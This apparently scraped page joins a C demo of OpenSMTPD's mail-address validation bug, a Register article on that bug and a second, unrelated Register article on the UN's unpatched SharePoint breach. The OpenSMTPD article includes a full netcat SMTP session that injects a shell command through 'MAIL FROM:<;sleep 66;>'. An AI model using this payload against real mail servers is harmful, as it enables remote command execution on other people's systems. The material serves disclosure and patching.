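#define DEMO_PARTSIZE 256

/* Hypothetical stand-in for OpenSMTPD's struct mailaddr. */
struct demo_mailaddr {
	char user[DEMO_PARTSIZE];
	char domain[DEMO_PARTSIZE];
};

/* atext: alphanumerics plus MAILADDR_ALLOWED; NUL is excluded because
 * strchr() would otherwise match the string terminator. */
static int demo_is_atext(int c)
{
	return c != '\0' &&
	    (isalnum((unsigned char)c) || strchr(DEMO_MAILADDR_ALLOWED, c) != NULL);
}

/* Local part: one or more atext runs separated by single dots. */
static int demo_valid_localpart(const char *s)
{
	for (;;) {
		if (!demo_is_atext(*s))
			return 0;
		while (demo_is_atext(*++s))
			;
		if (*s == '\0')
			return 1;
		if (*s++ != '.')
			return 0;
	}
}

/* Domain part: dot-separated labels of alphanumerics and '-', no label
 * starting or ending in '-'. The empty string fails, which is what routes
 * a domainless address into the default-domain branch below. */
static int demo_valid_domainpart(const char *s)
{
	for (;;) {
		if (!isalnum((unsigned char)*s))
			return 0;
		while (isalnum((unsigned char)*++s) || *s == '-')
			;
		if (s[-1] == '-')
			return 0;
		if (*s == '\0')
			return 1;
		if (*s++ != '.')
			return 0;
	}
}

/* Control flow of smtp_mailaddr() lines 2218-2237: an empty domain gets the
 * default filled in and 1 returned, even if it was the local part that failed. */
static int demo_check_vulnerable(struct demo_mailaddr *m, const char *dom)
{
	if (!demo_valid_localpart(m->user) || !demo_valid_domainpart(m->domain)) {
		if (m->domain[0] == '\0') {
			snprintf(m->domain, sizeof m->domain, "%s", dom);
			return 1;	/* BUG: local part never confirmed valid */
		}
		return 0;
	}
	return 1;
}

/* One hardened form (this example's, not necessarily the upstream patch):
 * complete the address first, then validate both parts. The empty return
 * path "<>" used by bounces is not modelled here. */
static int demo_check_fixed(struct demo_mailaddr *m, const char *dom)
{
	if (m->domain[0] == '\0')
		snprintf(m->domain, sizeof m->domain, "%s", dom);
	return demo_valid_localpart(m->user) && demo_valid_domainpart(m->domain);
}

/* Split "user@domain" (domain optional), run the vulnerable (use_fixed == 0)
 * or hardened check, and return its verdict: 1 accepted, 0 rejected. */
int demo_verdict(const char *text, int use_fixed)
{
	struct demo_mailaddr m;
	const char *at = strchr(text, '@');

	memset(&m, 0, sizeof m);
	snprintf(m.user, sizeof m.user, "%.*s",
	    (int)(at ? (size_t)(at - text) : strlen(text)), text);
	if (at != NULL)
		snprintf(m.domain, sizeof m.domain, "%s", at + 1);
	return use_fixed ? demo_check_fixed(&m, "example.org")
	                 : demo_check_vulnerable(&m, "example.org");
}

int main(void)
{
	/* Constructed samples; the injection string is the one quoted on the page. */
	const char *samples[] = { "alice", ";sleep 66;", ";sleep 66;@example.org" };
	size_t i;

	for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
		printf("%-24s vulnerable=%d fixed=%d\n", samples[i],
		    demo_verdict(samples[i], 0), demo_verdict(samples[i], 1));
	return 0;
}
```

The point the output makes is that both checks agree on every address except the one the bug is about: a bad local part with no domain. The vulnerable path accepts it only because the "add default domain" convenience was placed inside the failure branch and returns success without re-checking why it got there; the hardened form completes the address and then decides, so there is no way to reach a 1 without the local part having passed.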

Exploitation is trivial

To exploit this on your own deployment, connect to your local OpenSMTPD server using Netcat. The following interaction, provided by Qualys as a proof of concept, is just what your email client would go through with the server behind the scenes, though in this case, we’ll abuse the sender address field. Run Netcat with:

$ nc 127.0.0.1 25

And the daemon will introduce itself:

220 obsd66.example.org ESMTP OpenSMTPD

Reply by saying hello to the software:

HELO professor.falken

It acknowledges you:

250 obsd66.example.org Hello professor.falken [127.0.0.1], pleased to meet you

Here comes the magic. Inject the command sleep 66 to make the software pause for 66 seconds, using ; to escape from the delivery agent invocation:

MAIL FROM:<;sleep 66;>

And that’s it. The agent invocation command passed to the shell by OpenSMTPD will look something like /usr/libexec/mail.local -f ;sleep 66; followed by the rest of the command, which will probably fail as it is malformed, having been cut in half by the ;...; injection sequence.

All we care about is the first semicolon ending the mail.local invocation prematurely so that our slipped-in sleep 66 runs, and the second semicolon walling off the rest of the invocation command from affecting our injected command.

With that sent, the server replies:

250 2.0.0 Ok

Great, it’s accepted. Play out the rest of the message delivery, such as setting the recipient and message contents:

RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself

How about a nice game of chess?
.
250 2.0.0 e6330998 Message accepted for delivery
QUIT
221 2.0.0 Bye

And with that, the agent command will be run, including our injected sleep.

Interestingly, Qualys said the vulnerability was thought to be much more limited when it was first found: achieving non-trivial command execution is difficult due to various restrictions in place. However, the team were inspired by the 1988 Morris worm’s abuse of the DEBUG vulnerability in Sendmail to achieve full remote-code execution.

“Exploitation of the vulnerability had some limitations in terms of local part length (max 64 characters is allowed) and characters to be escaped (“$”, “|”),” said Animesh Jain, Qualys vulnerability signatures product manager.

“Qualys researchers were able to overcome these limitations using a technique from the Morris Worm (one of the first computer worms distributed via the Internet, and the first to gain significant mainstream media attention) by executing the body of the mail as a shell script in Sendmail.”

Admins are advised to update their software and installations as soon as possible. ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/30/openbsd_mail_bug/

UN didn’t patch SharePoint, got mega-hacked, covered it up, kept most staff in the dark, finally forced to admit it

The United Nations’ European headquarters in Geneva and Vienna were hacked last summer, putting thousands of staff records at miscreants’ fingertips. Incredibly, the organization decided to cover it up without informing those affected nor the public.

That is the extraordinary claim of The New Humanitarian, which until a few years ago was an official UN publication covering humanitarian crises. Today, it said the UN has confirmed both the hack and the decision not to divulge any details.

Dozens of UN servers were impacted in an attack that began in mid-July 2019 but was only noticed one month later, according to a confidential report dated September 20. The publication gained access to that report, which outlines a series of security holes discovered by an external forensic company as well as internal efforts to contain the hack.

“We are working under the assumption that the entire domain is compromised,” an alert sent to internal sysadmins on August 30 noted. “The attacker doesn’t show signs of activity so far, we assume they established their position and are dormant.”

A senior IT official dubbed the attack a “major meltdown,” in which personnel records – as well as contract data covering thousands of individuals and organizations – were accessed. The hackers were able to get into user-management systems and past firewalls, eventually compromising over 40 servers, with the vast majority at the European headquarters in Geneva.

But despite the size and extent of the hack, the UN decided to keep it secret. Only IT teams and the heads of the stations in question were informed.

“The attack resulted in a compromise of core infrastructure components,” a UN spokesperson told The New Humanitarian. “As the exact nature and scope of the incident could not be determined, [the UN] decided not to publicly disclose the breach.”

Just a quick password change, nothing to worry about

Employees whose data was within reach of the hackers were told only that they needed to change their password and were not informed that their personal details had been compromised. That decision not to disclose any details stems from a “cover-up culture,” the anonymous IT official who leaked the internal report told the publication.

The report notes it has been unable to calculate the extent of damage, but one techie – it is not clear whether it is the same one who leaked the report – estimated that 400GB had been pulled from United Nations servers.

Most worrying is the fact the UN Office of the High Commissioner for Human Rights (OHCHR) was one of those compromised. The OHCHR deals with highly sensitive information from people who put their lives at risk to uncover human rights abuses.

Making matters worse, IT specialists had warned the UN for years that it was at risk from hacking. An audit in 2012 identified an “unacceptable level of risk,” and resulted in a restructure that consolidated servers, websites, and typical services like email, and then outsourced them to commercial providers at a cost of $1.7bn.

But internal warnings about lax security continued, and an official audit in 2018 was full of red flags. “The performance management framework had not been implemented,” it stated, adding that there were “policy gaps in areas of emerging concern, such as the outsourcing of ICT services, end-user device usage, information-sharing, open data and the reuse and safe disposal of decommissioned ICT equipment.”

There were lengthy delays in security projects, and, internally, departments were ignoring compliance efforts. The audit “noted with concern” that 28 of the 37 internal groups hadn’t responded at all and that of the nearly 1,500 websites and web apps identified, only a single one had carried out a security assessment.

The audit also found that less than half of the 38,105 staff had done a compulsory course in basic IT security that had been designed to help reduce overall security risks. In short, this was an accident waiting to happen, especially given the UN’s high-profile status.

SharePoint shafting

As to the miscreants’ entry point, it was a known flaw in Microsoft SharePoint (CVE-2019-0604) for which a software patch had been available for months yet the UN had failed to apply it.

The hole can be exploited by a remote attacker to bypass logins and issue system-level commands – in other words, a big problem from a security standpoint. The hackers broke into a vulnerable SharePoint deployment in Vienna and then, with admin access, moved within the organization’s networks to access the Geneva headquarters and then the OHCHR.

One person who was shown the report – cybersecurity researcher Kevin Beaumont – said that the intrusion “has the hallmarks of a sophisticated threat actor.”

With North Korea, China, Iran, and others, as well as private criminal gangs, investing heavily in cyber-attack capabilities, it could be anyone, and the report does not find any fingerprints that point to a specific group. That may be a result of the UN trying to keep the entire thing under wraps.

It could also, of course, be the US, which would legally be allowed to target the UN in Geneva, as opposed to the UN headquarters in New York, because Geneva is outside North America. The United States, like other countries, has a long history of trying to find out what is going on behind closed doors at the United Nations.

Either way, it was a huge security cock-up on the UN’s part and its decision not to disclose it to anyone, even those impacted, flies in the face of modern best practice. ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/29/un_covered_up_hack/